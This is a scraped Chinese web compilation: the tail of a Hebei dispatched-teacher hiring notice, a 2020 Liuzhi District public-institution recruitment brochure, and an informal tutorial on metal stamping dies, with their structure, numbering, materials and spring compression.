2.对公示反映有严重问题并查有实据,不符合录用条件的,取消其拟录人选资格,对反映有严重问题但一时难以查实的,暂缓录用,待查实并做出结论后决定是否录用。
3.在办理录用手续期间,不在规定时间报到的,取消其录用资格,并从报考同一岗位中,按总成绩从高分到低分依次递补。
4.被录用人员与河北诺亚人力资源开发有限公司金石分公司签订《劳动合同》,并将其档案转入,由河北诺亚人力资源开发有限公司金石分公司为其管理人事档案、负责调整工资、职称评定、办理社会保险等有关事项。
十、薪酬待遇
派遣制教师试用期为三个月,试用期间报酬每人每月为2836.86元(含“五险”单位及个人缴纳部分费用)。试用期满第一年本科学历报酬每人每月为3186.63元、(均含“五险”单位及个人缴纳部分费用);第二年本科学历报酬每人每月为3469.76元(均含“五险”单位及个人缴纳部分费用),第三年本科学历报酬每人每月为3752.64元(均含“五险”单位及个人缴纳部分费用), 第四年本科学历报酬每人每月为4139.24元(均含“五险”单位及个人缴纳部分费用), 第五年本科学历报酬每人每月为4446.66元(均含“五险”单位及个人缴纳部分费用)。被派遣教师享受与在编教师同等的业务培训机会,对获得市级及以上政府、教育行政部门授予荣誉称号或教育科研部门评选的优质课、科研成果奖励的被派遣教师,报酬相应提高,奖励办法另行制定。
十一、其他有关事项:
1.凡考生未在规定时间内按要求参加笔试、证件审核、面试、体检、报到等情况的,均视为自动放弃应聘资格;资格审核贯穿招聘工作全程,在任何环节,发现考生不符合招聘条件,弄虚作假的,取消应聘资格,问题严重的要追究责任。
2.考生因体检、考察不合格或本人主动放弃派遣的,按所在岗位总成绩由高分到低分依次递补进入体检、考核程序。
3.请考生网上报名时,务必填写本人常用联系方式,确保在招录期间保持手机等通讯设备畅通。
4.此次考试不指定辅导用书,不举办也不委托任何单位举办任何形式的培训班。
十二、疫情防控事项:
1.按目前疫情防控有关要求,考生报名成功后即刻通过微信小程序申领“河北健康码”。考试当天,“河北健康码”为绿码且经现场测量体温低于37.3℃,并无干咳等异常症状的,方可进入考点参加考试。结合疫情防控形势,报名网站还将在考前发布考试实施具体防控要求,报考人员务必及时关注并遵照执行。
2.有发热症状以及参加应聘考试前14天内有新冠肺炎疑似症状、疫情严重地区人员接触史、疫情严重地区驻留史的要如实报告,招聘工作领导小组办公室在确保安全的前提下,合理安排笔试、面试等工作。
3.参加应聘考试的考生须佩戴一次性医用口罩,不得聚众交谈,各考生要保持一定距离,服从工作人员安排,否则取消应聘考试资格。
本公告由河北诺亚人力资源开发有限公司金石分公司负责解释。
详情登录
http://www.noahjob.cn/ProjectRecruitStep/Notice?PK_JPID=202008041026510500000000000004715846&PK_PFID=202008041026510810000000000004715860
[编辑|赵小博]
禁止转载
未经授权
凡本报原创作品
本报唯一官方微信
声明
河北日报
为加强六枝特区事业单位干部队伍建设,优化事业单位人员结构,增强事业单位活力,解决未就业的大专及以上毕业生就业问题,根据《事业单位公开招聘人员暂行规定》(人事部令〔2005〕第6号)、贵州省人事厅《关于印发〈贵州省事业单位新增人员公开招聘暂行办法〉的通知》(黔人发〔2006〕4号)、《人力资源社会保障部教育部司法部农业农村部文化和旅游部国家卫生健康委国家知识产权局关于应对新冠肺炎疫情影响实施部分职业资格“先上岗、再考证”阶段性措施的通知》(人社部发〔2020〕24号)等有关规定,六枝特区2020年面向社会公开招聘事业单位工作人员448名。为确保本次招聘工作顺利进行,结合我区实际,特制定《六枝特区2020年面向社会公开招聘事业单位工作人员简章》(以下简称《招聘简章》)。
一、招聘工作的基本原则和程序
招聘工作严格按照公开、平等、竞争、择优的原则,采取考试与考察相结合的方式进行,实行公开报考条件、公开考试程序、公开考试结果“三公开”制度。招聘工作按照编制招聘计划、发布招聘简章、网上报名、网上资格审核、笔试、现场资格复审、面试、体检、考察、公示、聘用审批的程序进行。
二、招聘计划及职位
六枝特区2020年面向社会公开招聘事业单位工作人员448名。具体招聘职位详见《六枝特区2020年面向社会公开招聘事业单位工作人员职位一览表》(见附件)。
三、招聘对象及报考条件
(一)招聘对象
1.本省户籍或本省生源大专及以上学历的应、往届毕业生(2020届毕业生不含委培生、定向生);
2.外省籍普通高等教育全日制本科及以上毕业学历人员(2020届毕业生不含委培生、定向生);
3.由省级及以上机关统一选派在六枝特区服务的“三支一扶计划”、“选聘高校毕业生到村(社区)任职计划”(一村一名大学生工程)、“大学生志愿服务西部计划”、生源地或兵源地为六枝特区籍的退役大学生士兵(以上人员统称“基层服务项目人员”);
4.六枝特区籍建档立卡户和易地扶贫搬迁户高校毕业生;
5.六枝特区乡镇(街道)村(居)干部。
(二)报考条件
1.具有中华人民共和国国籍;
2.拥护中华人民共和国宪法、拥护中国共产党的领导,热爱社会主义,有良好的政治素质和道德品质,具有为人民服务的思想,遵纪守法;
3.年龄在18周岁及以上(2002年8月8日及以前出生)、35周岁及以下(1984年8月9日及以后出生)。获得硕士、博士研究生学历(非在职)及具有中级及以上职称人员,年龄可放宽到40周岁(1979年8月9日及以后出生);
4.基层服务项目人员的职位,符合下列条件之一的方可报考:
由省级及以上机关统一选派到六枝特区服务的“三支一扶”计划、“选聘高校毕业生到村(社区)任职计划”(一村一名大学生工程)、“大学生志愿服务西部计划”人员,限截止2020年8月8日累计服务满两年的人员报考;六枝特区籍退役大学生士兵限普通高等教育全日制学校在校期间入伍退役后完成学业或毕业后应征入伍的退役士兵报考;
5.六枝特区籍建档立卡户和易地扶贫搬迁户高校毕业生报考条件以《六枝特区2020年面向社会公开招聘事业单位工作人员职位一览表》岗位具体要求为准;
6.村(居)干部人员的职位:限享有村(居)干部报酬,纳入专职化管理的村(居)支书(副支书)、主任(副主任)任职满一届(满三年暂未换届的视为一届)及以上,且报考时仍在村(居)任以上职务的干部报考,乡(镇、街道)和机关事业单位下派编制人员及事业编制村文书除外,年龄放宽到40周岁(1979年8月9日及以后出生);
7.具备相应资格
(1)要求教师资格证的岗位。对于未取得教师资格证的人员,凡符合教师资格考试报名条件和教师资格认定关于思想政治素质、普通话水平、身体条件等要求的可先上岗从事教育教学相关工作,再参加考试取得教师资格证。
(2)要求护士执业资格证等职业资格的岗位。凡符合护士执业资格考试报名条件的高校毕业生,可以先上岗从事相关工作,再参加考试并取得职业资格。
先上岗、后考证的高校毕业生参加事业单位公开招聘被聘用从事相关工作的,在一年试用期内未取得相应职业资格的,应当依法解除聘用合同;
8.具有正常履行职责的身体条件;
9.具备拟报考职位所需的其他资格条件。
(三)以下人员不得报考:
1.截止2020年8月8日,六枝特区仍在职在编的国家机关和事业单位工作人员(含试用期人员);
2.定向到具体行业或单位的2020届毕业生;
3.截止2020年8月8日在读的非2020届大专及以上毕业生;
4.曾因犯罪受刑事处罚的人员;
5.曾被开除公职或被辞退未满5年的人员;
6.任职(工作)或服役期间发生重大责任事件的人员,曾因贪污、行贿受贿、泄露国家机密等原因受到党纪、政纪处分或近三年在年度考核中曾被确定为不称职(不合格)的人员;
7.在各级公务员招考、事业单位招聘考试中被认定有舞弊等严重违反考试录用纪律行为的人员;
8.聘用到职后即构成回避关系的人员;
9.不符合招聘职位要求的有关条件的人员;
10.违反国家计划生育政策的人员;
11.有法律、法规规定不得聘用到事业单位工作的人员。
四、报名及资格审查
(一)报名
报名统一在网上进行,不设现场报名点。报名按以下程序进行:报考人员可在2020年8月8日9:00至8月10日16:00期间通过“http://liuzhi.pzhl.net”(六枝特区人事考试网上报名服务平台)登录报名系统,提交报考申请。报考者只能选择一个职位进行报名,报名与考试时使用的本人有效居民身份证必须一致。报名时,报考人员应当仔细阅读并签署《诚信承诺书》及《六枝特区2020年面向社会公开招聘事业单位工作人员考试新冠肺炎疫情防控告知暨承诺书》,提交的报考申请材料应当真实、准确、完整。报考者因身份证过期、信息填写失误、照片模糊变形等原因,导致后续考试过程中出现无法通过资格审查等问题的,后果自负。报考者提供虚假报考申请材料的,一经查实,即取消报考资格。对伪造、变造有关证件、材料、信息,骗取考试资格的,将按照有关规定严肃处理。
报考人员应按照公布的招聘职位、报考资格条件及要求报名。如实填写《六枝特区2020年面向社会公开招聘事业单位工作人员报名信息表》(以下简称《报名信息表》),考生选择要报考的职位点击“提交”,确认报考职位无误后点击“确认”。报名考生上传照片需下载“照片审核工具”,提供本人近期免冠2寸正面证件照片(jpg格式、不超过30KB),经“照片审核工具”审核通过后方可上传。报考申请被接受后,系统会向报考人员反馈一个报名序号。报名序号是报考人员查询网上资格初审结果、网上缴费确认、打印准考证等事项的重要依据,请妥善保管。
注意:报考人员在提交报名信息并成功上传照片后,都需进行报名信息复核。确认报考职位后将无法再进行修改,资格初审不合格的考生无法再次报考原职位,通过网上资格初审的,报考人员将不能对报名信息进行修改,请考生认真核对。报考人员故意隐瞒本人重要信息或提供虚假报考申请材料的,一经查实,立即取消进入下一个环节的资格。
(二)网上资格初审
1.资格初审在特区招聘工作领导小组办公室统一组织下,由各招聘单位负责。各招聘单位对已经提交报名申请的报考人员,必须在提交《报名表》后24小时内审核完毕。招聘单位根据报考人员填写的个人信息,对照《招聘简章》和职位所需的资格条件进行资格初审,经初审合格的予以确认。对符合报名条件的,不得拒绝报名;对审查不合格的,应说明理由。资格初审不合格人员,在报名期间(2020年8月10日16:00前)可重新提交报名申请。各招聘单位资格初审时间为2020年8月8日9:00—2020年8月11日16:00。
资格初审环节中有不符合条件的报考人员进入报名缴费环节的,在资格初审期间由报考人员和招聘单位(或主管部门)提出申请,经特区招聘工作领导小组办公室审核同意后,由负责报名工作的部门给予改报,缴费结束后仍未改报成功的,取消考试资格,进入考试环节的该报考人员考试成绩无效并追究审核有关人员责任。
2.通过资格初审的报考人员,姓名、身份证号有误的可自行按正确姓名、身份证号重新报名;其他信息有误的,须本人向招聘单位申请,经特区招聘工作领导小组办公室同意后,由负责报名工作的部门给予修改。
3.招聘单位在2020年8月11日16:00前完成审核。审核仍未通过的人员,视为报名失败。报考人员提交报名申请成功后请及时登录查看审核状态,通过资格初审的报考人员,不得再报考其他职位,考生应留下正确的联系电话,保持畅通。
4.网上缴费。通过资格初审的报考人员于2020年8月8日9:00至8月11日20:00在指定报名网站缴纳100元报名费。在规定时间内未缴费者视为自动放弃。
报名缴费后,报名人数与计划招聘人数达不到3:1比例的职位,该职位招聘计划予以减少或取消。职位招聘计划减少的,报考该职位的考生不再进行调整;职位招聘计划取消的,由报考该职位的考生本人申请,经特区招聘工作领导小组办公室同意后,由负责报名工作的部门给予改报其他职位,改报职位的截止时间为2020年8月12日17:00。因所报考职位取消且本人自愿放弃报考需要退费的,经特区招聘工作领导小组办公室同意后给予退费。特区招聘工作领导小组办公室在报名结束后对减少、取消的职位在六枝特区人民政府网上(网址:http://www.liuzhi.gov.cn/)进行公示。
5.网上打印笔试准考证。报考人员于2020年8月20日上午9:00至8月22日下午17:00期间,登录“六枝特区人事考试网上报名服务平台”打印笔试准考证。
五、笔试
(一)笔试为闭卷考试。笔试科目为《职业能力倾向测验》和《综合应用能力》两科。
(二)笔试时间:2020年8月24日上午
09:00——10:30《职业能力倾向测验》
10:30——12:30《综合应用能力》
(三)笔试成绩=职业能力倾向测验成绩+综合应用能力成绩
(四)笔试地点详见《笔试准考证》
考生须同时持本人有效《居民身份证》(或有效临时身份证)和《笔试准考证》方能进入考场参加笔试。
此次笔试考试类别分为综合管理类(A类)、中小学教师类(D类)、医疗卫生类(E类),其中医疗卫生类下设中医临床岗位、西医临床岗位、药剂岗位、护理岗位、医学技术岗位、公共卫生管理岗位六个小类(详见附件《职位一览表》)。
未完成笔试所有科目、未取得有效笔试成绩的考生,取消进入下一环节资格。
六、资格复审
资格复审按照分级负责的原则,采取现场审查方式进行。资格复审工作在特区招聘工作领导小组办公室统一组织下,由各招聘单位具体负责实施,资格审查贯穿整个公开招聘工作始终,在公开招聘过程中任一环节发现报考人员资格条件不符合《招聘简章》要求的取消其进入下一环节资格。资格复审对象依据笔试成绩从高分到低分按资格复审人数与职位招聘计划数3:1比例以内(含3:1)的人员确定。同一职位报考人员笔试成绩名次末位并列的同时确定为资格复审人员。
参加资格复审的考生须持相关证书(毕业证书、学位证书、教师资格证等)、本人有效《居民身份证》原件及复印件等报考职位要求的资格条件证明材料,近期同底正面免冠一寸彩色照片2张到指定地点进行现场资格复审。
公职人员(党政机关、事业单位、国有企业在岗人员)须同时持具有人事管理权限部门同意报考证明(中、小学教师还须持县级及以上教育行政主管部门的证明);基层服务项目人员须持“基层项目服务证书”或县级主管部门出具的基层项目服务身份证明;退役大学生士兵须持退伍证;六枝特区籍建档立卡户和易地扶贫搬迁户高校毕业生须分别持有六枝特区扶贫局出具的建档立卡贫困户证明材料和六枝特区生态移民局出具的易地扶贫搬迁户证明材料;六枝特区乡镇(街道)村(居)干部须持特区组织部出具的任职证明材料。其他在职人员须出具用人单位同意报考证明,到指定地点进行现场资格复审。
各招聘单位按照《招聘简章》和报考人员填写的《报名表》以及考生提供的相关资料,对考生是否符合报考职位所需资格条件进行复审,经复审符合招聘职位所需资格条件的报考人员,由负责资格复审的工作人员签署意见,并加盖公章。
经复审不符合报考条件或未在规定时间内到指定地点进行资格复审的考生,取消其进入下一环节资格,该职位空缺人数在递补复审期内按笔试成绩由高到低依次递补。招聘单位24小时内无法联系到复审递补人员的,视为递补人员自动放弃。经资格复审,复审合格人数与招聘计划数比例达不到要求的,按规定减少或取消招聘计划。
考生应关注资格复审相关公告,如因考生未阅公告或错填联系电话、关闭电话、更改电话号码等原因导致无法联系而未参加复审的,其后果由考生本人承担。
资格复审结束后,资格复审合格人员进入面试。由特区招聘工作领导小组办公室将进入面试人员名单和职位取消及减少情况予以公示。
资格复审时间、地点等相关事宜另行通知。
七、面试及总成绩
(一)面试
面试工作在特区招聘工作领导小组的领导下进行。面试人员为公示无异议的资格复审合格人员。资格复审合格人数与职位招聘计划数达不到3:1比例的最后1名或2名考生,其面试成绩须达到本考场当日面试实考考生平均分及以上,方能进入下一环节。未参加面试的考生取消进入下一环节资格。
面试方式、时间、地点等另行确定。
(二)总成绩计算
考生总成绩按百分制计算。其中,笔试成绩百分制折算后占60%,面试成绩百分制折算后占40%。笔试、面试成绩和总成绩均按“四舍五入法”保留小数点后两位数字。同一职位考生总成绩名次出现并列的,笔试成绩高的考生进入下一环节,若笔试成绩也相同,以《职业能力倾向测验》科目成绩高的考生进入下一环节。若《职业能力倾向测验》成绩也相同,由特区招聘领导小组办办公室另行组织笔试考试,笔试成绩高的考生进入下一环节。
八、体检
体检根据职位招聘计划数按总成绩由高到低等额确定体检对象;考生放弃体检或体检不合格的,取消进入下一环节资格,空缺职位不予递补。
体检由特区招聘工作领导小组办公室组织到指定的县级及以上综合性医院在规定时间内进行并作出体检结论,其他的体检结论、鉴定一律不予认可。
体检标准按《公务员录用体检通用标准(试行)》(国人部发〔2005〕1号)、《公务员录用体检操作手册(试行)》、《关于印发<公务员录用体检操作手册(试行)>有关修订内容的通知》(人社部发〔2013〕58号)、《关于修订〈公务员录用体检通用标准(试行)〉及〈公务员录用体检操作手册〉(试行)有关内容的通知》(人社部发〔2016〕140号)、《关于印发公务员录用体检特殊标准(试行)的通知》(人社部发〔2010〕82号)和我省的有关规定执行。
体检结束后,考生对体检结果有疑义的,在国家体检标准规定允许复检的项目内,考生应在接到体检结果通知3日内书面提出复检申请,经特区招聘工作领导小组办公室同意后组织复检。超过3日提交的复检申请不予受理,复检只能进行一次,体检结果以复检结论为准。
体检费用由考生自理,体检时间等相关事宜另行通知。
九、考察
体检合格的考生确定为考察对象,考察内容主要包括考生的政治思想、道德品质、能力素质、学习和工作表现、遵纪守法、廉洁自律以及是否需要回避等。
考察工作由特区招聘工作领导小组办公室统一部署,各招聘单位具体负责实施。考察应当组成考察组,考察组由两人及以上组成。考察组应当广泛听取意见,做到全面、客观、公正,并据实写出考察材料、提出聘用建议意见。
考察时还须进一步核实考生是否符合规定的报考资格条件,确认其报名时提交的信息和材料是否真实、准确。在考察中,经特区招聘工作领导小组办公室审定有《招聘简章》规定“不得报考条件”所列情况之一或不符合职位要求资格条件者,取消其进入下一环节资格。
十、公示和聘用审批
(一)公示
经笔试、面试、体检、考察合格的考生,确定为拟聘用人员,由特区招聘工作领导小组办公室在六枝特区人民政府网上(网址:http://www.liuzhi.gov.cn/)进行公示,接受社会监督。
公示期间查实有严重问题影响聘用的,取消聘用资格。一时难以查实的,暂缓聘用,待查实并做出结论后再决定是否聘用。
(二)聘用审批
对公示期满无异议或反映的问题不影响聘用的,各招聘单位填写《公开招聘事业单位工作人员聘用审批表》经主管部门审核后,报六枝特区人力资源和社会保障局办理聘用手续。一经聘用,服务年限按六枝特区相关规定执行。
根据《人力资源社会保障部 教育部 司法部 农业农村部 国家卫生健康委 国家知识产权局关于应对新冠肺炎疫情影响实施部分职业资格“先上岗、再考证”阶段性措施的通知》(人社部发〔2020〕24号)精神,对实施“先上岗、再考证”阶段性措施的准入类职业资格,高校毕业生参加本次招聘被聘用从事相关工作的,事业单位与先上岗的高校毕业生签订聘用合同时,应当按规定约定1年试用期;先上岗的高校毕业生在试用期内未取得相应职业资格的,将依法解除聘用合同。
十一、工作要求及注意事项
(一)纪律监督。招聘工作主动接受纪检监察部门和社会各界监督。工作人员和考生须严格遵守有关规章制度,如有违反或弄虚作假的,一经查实,将严格按照有关规定予以处理。
(二)本次招聘考试不指定考试用书,不举办也不委托办任何培训班。
(三)为了在疫情防控安全的前提下开展好笔试、资格复审、面试等工作,所有参加本次事业单位招聘考试的考生必须仔细阅读《六枝特区2020年面向社会公开招聘事业单位工作人员考试防疫指南》并严格执行,若未按《六枝特区2020年面向社会公开招聘事业单位工作人员考试防疫指南》进行管理,所产生的所有后果,由考生自行承担。
(四)本次招聘考试所有信息均发布在六枝特区人民政府网上(网址:http://www.liuzhi.gov.cn/),不再另行电话通知。
(五)本《招聘简章》解释权属六枝特区招聘工作领导小组办公室。
咨询电话:0858—5328068。
(六)本次招聘工作未尽事宜,由六枝特区招聘工作领导小组研究确定。
附件1:六枝特区2020年面向社会公开招聘事业单位工作人员职位一览表.xlsx
附件2:《六枝特区2020年面向社会公开招聘事业单位工作人员考试防疫指南》.wps
附件3:六枝特区2020年面向社会公开招聘事业单位工作人员考试新冠肺炎疫情防控告知暨承诺书.docx
来源:六枝人才网(www.lztqrcw.com)
请复制原文查看附件:http://www.lztqrcw.com/index.php?m=&c=notice&a=notice_show&id=372
★冲压模具的概念
冲压模具,也称冲模、五金模具、五金冲压模具,意思差不多都是一样的。是指利用固定在冲床或压力机上的模具对金属或非金属板材施加一定的压力,使材料产生分离或成型,从而获得一定尺寸要求、外观质量合格的零件的压力加工方法。模具分为很多种,我这里主要是针对我熟悉的五金冲压模具来讲。
通过模具加工出来的产品,尺寸、外观都基本一样,没什么大的区别,因为能快速成型,生产效率高,产品质量稳定,精度符合要求,材料利用率高,操作简单、工人劳动强度低,对操作工人技术要求不高,一般人只要一进来,跟着别人学习操作一两天,很快就能上手,有的甚至不用一两天,几分钟就能学会。如果是产线主机手,要学会操作冲床、送料机、整平机、拆模架模等,都是一些很简单的活,有力气、肯吃苦耐劳就行。
平时注意安全不要随便往模具里面放任何的东西在里面,扳手啊、剪刀啊、其它工具等不要放模具里边,有模修来修过模具(专业术语:修模)之后,你打之前就要看好了,看他们有没有把东西忘记在模具里面,当然一般模修是不会犯这样的错误的,不过你也要注意一下。别把模具打坏了、或者把身上手上哪里伤着了,干这个切记注意安全,一不小心模具里面东西忘记拿出来了,冲床打下来就有可能把模具打坏,万一里面的东西要是飞出来了?,人有可能也会受伤。
有时候叉车叉模具的时候,没叉好,模具掉下来了,这个时候千万别用手去扶,让远一点,模具摔坏了没事,别把人砸到了;天车吊模具的时候也要注意离模具远一点,小心模具晃过来碰着了就不好了。
搞模具这行、或与模具打交道经常容易出事,新人进厂特别要注意这些安全事项。
★冲压模具的结构介绍
冲压模具的结构、冲模的结构,模具结构大同小异,根据不同的产品特点及需求设计相应的模具,不同的模具结构,它的功能也不同,生产出来的产品也不同,总的来说有简单的,有复杂的。但是不管结构怎么复杂,它的基本结构是不变的,无外乎是若干个模板、模块和标准件。
模具一般是由若干模板和零件(我们称之为入块、或入子)还有标准件组装而成。
一般的冲压模具结构,具体的模板从上到下(包括代码编号)是:
上模的模板有:
上托板,上垫脚,上模座(UPU),上垫板(UBU),上夹板(PHU)止挡板(PPS),脱料板(PSU);
下模的模板有:
下模板(DIE),下垫板(LBD),下模座(LPD),下垫脚,下托板;
其它的旧较不常用的模板:
上盖板(CVU),挤出板,上模板,下脱料板,下止挡板,下夹板,公模,母模等;
一些模具零件有:
上模的入子,入块:夹板入块、脱料板入块、冲头等;
下模的入子,入块:下模入块、下模刀口等;
标准件:弹簧、六角螺丝、止付螺丝、线簧、等高套、导柱、导套、等高套垫片、两用销、顶料销等;
非标准件:外定位、内定位、节距定位、外限位柱、内限位柱等;
★冲压模具的编号
冲压模具编号,一般是这样写的(举例):
工程模:90-KNMF0125RAH,90-KNMF0125RAA,90-KNMF0125RBB
连续模:90-KNMF0125SAA,90-KNMF0125SBB
后面的RAH,R代表工程模,H代表总共有八套(从A-H,分别是RAH、RBH……RHH),A代表第一套;RAA或RBB代表铆合模,比如铆螺柱、铆弹片等;
SAA、SBB中的S代表连续模,0125代表模具编号,前面的F代表年份,哪一年生产出来的模具,就用代表哪一年的编号说明,如:F0125、G0125,如果F代表2010年,那么2010年生产的模具F0125可以简称:125模具,接下来2011年生产的模具,则是G开头,此时你再说125模具,那别人多半以为是G0125模具了。
其它的比如上夹板(PHU),编号则是90-KNMF0125SAAPHU,夹板入块90-KNMF0125SAAPHPA001;
如果这个连续模有两段的话,则在90-KNMF0125SAAPHU编号后面用A和B来说明,那么第一段的夹板应该是90-KNMF0125SAAPHUA,第二段90-KNMF0125SAAPHUB,夹板入块90-KNMF0125SAAPHPA001、90-KNMF0125SAAPHPB001;
下模板(DIE):90-KNMF0125SAADIE,90-KNMF0125RAHDIE
关于其它的编号,这里没有解释到的,简单做一下说明:
★冲压常用材料及选用
冲压所用材料的性质与冲压生产的关系非常密切,其性质直接影响冲压工艺设计、冲压件质量和产品使用寿命,还影响组织均衡生产和冲压件生产成本。
在选定冲压件的材料时,不仅要考虑使用性能,还应满足冲压加工和后续工艺性能要求。冲压加工对材料的基本要求如下。
1、具有良好的冲压成型性能
对于成型工序,比如拉伸、折弯、打段差、凸包等,材料应具有良好的冲压成型性能,即应有良好的抗破裂性、良好的贴模性和定形性,否则产品容易产生变形、破裂等,造成修模的困难。对于分离工序,则要求材料具有一定的塑性。
2、具有较高的表面质量
材料表面应光洁平整,无缺陷损伤。表面质量好的材料,成型时不易破裂,不易擦伤模具,制件的表面质量也好。
3、材料的厚度公差应符合国家标准
因为一定的模具间隙仅适用于一定厚度范围的材料,若材料厚度公差太大;不仅直接影响制件的质量,还可能导致废品的出现。在校正弯曲、整形等工序中,有可能因厚度正偏差过大而引起模具或压力机的损坏。
1、冲压常用材料
冲压生产中最常用的材料是金属材料(包括黑色金属和有色金属),但有时也用非金属材料。其中黑色金属主要有普通碳素结构钢、优质碳素结构钢、合金结构钢、碳素工具钢、不锈钢、电工硅钢等;有色金属主要有纯铜、黄铜、青铜、铝等;非金属材料有纸板、层压板、橡胶板、塑料板、纤维板和云母等。
冲压用金属材料的供应状态一般是各种规格的板料和带料。板料可用于工程模的生产,带料(卷料)用于连续模的生产,也可以用于工程模的生产。板料的尺寸较大,可用于大型零件的冲压,也可以将板料按排样尺寸剪裁成条料后用于中小型零件的冲压;带料(又称卷料)有各种规格的宽度,展开长度可达几十米,成卷状供应,适应于连续模大批量生产的自动送料。
关于各种材料的牌号、规格和性能,可查阅有关手册和标准。
2、冲压材料的合理选用
冲压材料的选用要考虑冲压件的使用要求、冲压工艺要求及经济性等。
(1)按冲压件的使用要求合理选材
所选材料应能使冲压件在机器或部件中正常工作,并具有一定的使用寿命。为此,应根据冲压件的使用条件,使所选材料满足相应强度、刚度、韧性、耐蚀性和耐热性等力方面的要求。
(2)按冲压工艺要求合理选材
对于任何一种冲压件,所选的材料应能按照其冲压工艺的要求,稳定地成形出不至于开裂或起皱的合格产品,这是最基本也是最重要的选材要求。为此,可用以下方法合理选材。
①试冲。根据以往的生产经验及可能条件,选择几种基本能满足冲压件使用要求的板料进行试冲,最后选择没有开裂或皱折的、其废品率低的一种。这种方法结果比较直观,但带有较大的 盲目性。
②分析与对比。在分析冲压变形性质的基础上,把冲压成型时的最大变形程度与板料冲压成型性能所允许采用的极限变形程度进行对比,并以此作为依据,选取适合于该种零件冲压工艺要求的板材。
另外,同一种牌号或同一厚度的板材,还有冷轧和热轧之分。我国国产板材中,厚板( t>4mm)为热轧板,薄板(t<4mm)为冷轧板(也有热轧板)。与热轧板相比,冷轧板尺寸精确,偏差小,
表面缺陷少,光亮,内部组织致密,冲压性能更优。(注:t在模具中一般代表厚度,例如模板的厚度、材料的厚度均可以用t来表示。)
(3)按经济性要求合理选材
所选材料应在满足使用性能及冲压工艺要求的前提下,尽量价格低廉,来源方便,经济性好,以降低冲压件的成本。
★冲压模具的分类
冲压模具的分类,一般我们可以简单的把它分为两种,即工程模和连续模;
工程模又可以分为复合模、拉伸模、铆合模等,下面简单介绍一下这些模具的结构和作用;
工程模:也称为“单工序模”,是指在冲压的一次行程中,只能完成一个冲压工序的模具。这一工程打完了之后,需要人工或用机械手把产品从模具里面取出来,然后放到下一站的模具里面继续生产,直到模具的最后一个工序打完,整个产品才算完成。这种模具维修起来简单,但生产起来费时费力,需要花费较多的人工和时间成本,产品报废率较高。
复合模:常见的复合模具结构有有复合下料、复合拉伸等,这种模具结构和别的工程模结构略有不同。其凸模(也称为公模或冲头)设计在下模,其它几块模板依次是下夹板(固定凸模冲头)、下止挡板和下脱料板(外脱),上模依次是母模(或刀口)、内脱板和上垫板构成,内脱使用等高套筒挂在上垫板上面,然后用打杆或弹簧顶着。比如用来下料的复合模,其内脱一般脱出来母模0.50mm即可,不可以低于母模,要不然母模刀口容易崩掉或者不脱料。内脱的力量要足够大,才能把产品从母模里面顶出来,一般如果材料比较厚的话,我们上面装的是氮气弹簧。
连续模:也称“级进模”,是指在冲压的一次行程过程中,在不同的工位上同时完成两道或两道以上冲压工序的模具,这种模具维修难度较大,需要经验丰富的钳工师傅来操作,但是生产起来效率很高,打得速度快的话一个小时可以生产上千个产品,节省人工和时间成本,产品报废率较低。
★弹簧的压缩量和计算
在一套冲压模具中,需要用到比较多的弹性材料,其中包括各种不同规格的弹簧、优力胶、氮气弹簧等,按照不同的需要选用不同的弹性材料。像折弯、冲孔一般用普通的扁线弹簧就可以了,比如棕色弹簧,也称为咖啡色弹簧;如果力量不够就加氮气弹簧,当然成本要高一点;优力胶一般用于拉伸模具、整形模具、或整平面度用。
拉深模具用优力胶非常不错,当然也可以选用氮气弹簧。其他的像顶料销、浮块、两用销等一般用线簧或黄色弹簧,只要可以脱料、不把产品顶出印子、顶变形就好了。优力胶的特点就是力量比较均衡,然而其寿命比较短,生产一段时间就可能裂掉了、不行了、萎掉了,因此一般比较少用,通常比较常用氮气弹簧。整平面度优力胶用的多。
弹簧包括扁线弹簧、线簧等,弹簧的目的就是脱料、压料,弹簧力度的大小,关系着模具生产是否顺利、打出来的产品是否合格等。弹簧力量小了,有可能会造成产品变形、模具不脱料、产品不好从模具里面拿出来、带料,刀口、冲头容易磨损等各种问题。
扁线弹簧一般按颜色划分为:棕色、绿色、红色、蓝色、黄色,力量也依次减弱,颜色不同,力量大小就不同,压缩量也不同。
有一个土方法可以计算弹簧的压缩量,那是我刚进厂学模具不久,对模具还不怎么懂,我师父教我的:事先测量一下弹簧的总高度,再把弹簧放台虎钳中,锁死,然后用卡尺测量一下弹簧被夹死之后剩下的长度,再用弹簧的总长度减去这个数,再除以总长度即可,此方法任何弹簧通用,比如棕色弹簧长度为60mm,被虎钳夹死后应该还剩下45.6左右,然后你再用60减去45.6等于14.4,再用14.4除以60,结果等于0.24,这就是它的压缩量。
弹簧按照不同生产次数,比如100万次、50万次、30万次,压缩量选的越大,弹簧寿命越短,模具寿命也就越短(当然弹簧打坏了是可以换的),模具生产一段时间可能弹簧就没力了,质量差一点的弹簧还有可能断在模具里面。一般按照30万次来计算弹簧的压缩量,也就是说模具打30万次弹簧可能就没力了,当然一般的冲压模具寿命都没那么长,也可以按最大压缩量来计算,按最大压缩量来计算的话,只能保证弹簧不打爆在模具里面。模具压得死一点,对产品平面度也有好处。
具体的压缩量如下表:
颜色
100次
50万次
30万次
最大压缩量
棕色弹簧
16%
18%
20%
24%
绿色弹簧
19.20%
21.60%
24%
28%
红色弹簧
25.60%
28.80%
32%
38%
蓝色弹簧
32%
36%
40%
48%
黄色弹簧
40%
45%
50%
58%
最大压缩量(这个弹簧可以压下去多少),弹簧的最大压缩量等于弹簧的自由高度乘以弹簧的最大压缩比,例如棕色弹簧,长度为60mm,那么它的最大压缩量为:60*24%约等于14,这根弹簧最大可以压下去14个毫米,它的最大行程是14个毫米,模具的行程必须小于14个毫米,超过14个毫米,弹簧就可能会失效、变形,还有可能打断在模具里面,或模具打爆,冲床压不下去等。
模具组立之前,也就是装模之前,必须先计算一下弹簧的压缩量是否合适,这样在试模的时候才不用担心模具会出问题、打爆等。
★冲压模具间隙值的确定
冲裁间隙值的确定,一般使用的是经验公式与图表。
做冲压模具钳工、冲压模具设计工作时间久了的人,因为经验丰富,自然会比较了解、知道各种不同的产品,包括它的材料、尺寸和外观精度要求,以及模具该怎么设计才能顺利生产出合格的产品,怎样减少模具维修、修模次数等,拿到产品图,心里自然的就会想到这个模具结构大概是个什么样子,各种数值心里都有数。
冲头与刀口的间隙对冲压件质量、冲压模具寿命都有很大的影响。因此,设计冲压模具时一定要选择一个合理的间隙,以保证冲压件的断面质量、尺寸精度满足产品的要求、所需冲裁力小、冲压模具寿命高。但分别从质量、冲压力、冲压模具寿命等方面的要求确定的合理间隙并不是同一个数值,只是彼此接近。
